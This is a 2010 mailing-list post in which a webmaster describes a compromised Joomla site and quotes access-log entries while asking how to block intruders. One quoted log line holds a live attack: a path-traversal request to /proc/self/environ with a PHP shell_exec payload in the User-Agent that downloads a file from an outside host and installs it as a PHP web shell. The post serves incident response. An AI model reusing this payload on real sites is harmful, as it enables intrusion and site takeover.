[thelist] block phishing
Bob Meetin
bobm at dottedi.biz
Sun Mar 28 11:20:15 CDT 2010
I got a notice that one of my sites got hit yesterday, so I logged in,
and identified the file mentioned, also found a couple php files that
got dropped into webhome that were related. I moved the files into an
out of webroot folder for future scrutinization, then checked the server
access log, found a number of entries at the approximate date stamp of
the uploaded files that seemed to be related.
I am methodically going through the system looking for anything not
locked down. What I could use some help with is understanding if the
access log entries are associated and how to lock out the intruders. As
IP addresses change I suspect it's more than simply editing the
robots.txt or adding a line in the .htaccess. Some of the suspicious
entries look like:
123.125.66.72 - - [27/Mar/2010:18:58:09 -0500] "GET / HTTP/1.1" 200
18076 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
83.229.80.30 - - [27/Mar/2010:18:58:41 -0500] "POST /fat.php HTTP/1.1"
200 8015 "http://www.$websitename/fat.php" "Mozilla/5.0 (Windows; U;
Windows NT 6.0; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET
CLR 3.5.30729)"
fat.php was one of the deposited files. 18:58 was the datestamp.
75.125.130.100 - - [27/Mar/2010:22:25:47 -0500] "GET
/administrator/host.php HTTP/1.0" 200 73956 "-" "\"Mozilla/4.0"
Related? There is nothing (current) in the filesystem called host.php
80.246.53.20 - - [27/Mar/2010:22:25:41 -0500] "GET
/index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00%0F
HTTP/1.1" 200 1423 "-" "<? shell_exec('lwp-download
http://immortal-killaz.servercamp.de/fanatix/tv.txt;mv tv.txt
print_out.php');?>"
com_sectionex is a Joomla component. There is also no legitimate file
called print_out.php but which I found.
75.125.130.100 - - [27/Mar/2010:22:25:48 -0500] "GET
/administrator/hr57.php HTTP/1.0" 200 73956 "-" "\"Mozilla/4.0"
Suggestions for robots.txt:
|#Baiduspider
User-agent: Baiduspider
Disallow: /
#Others
User-agent: *
Disallow: /
Suggestions for .htaccess:
||<Files *.*>
order allow,deny
allow from all
deny from 220.181.
</Files>
-Bob
|
More information about the thelist
mailing list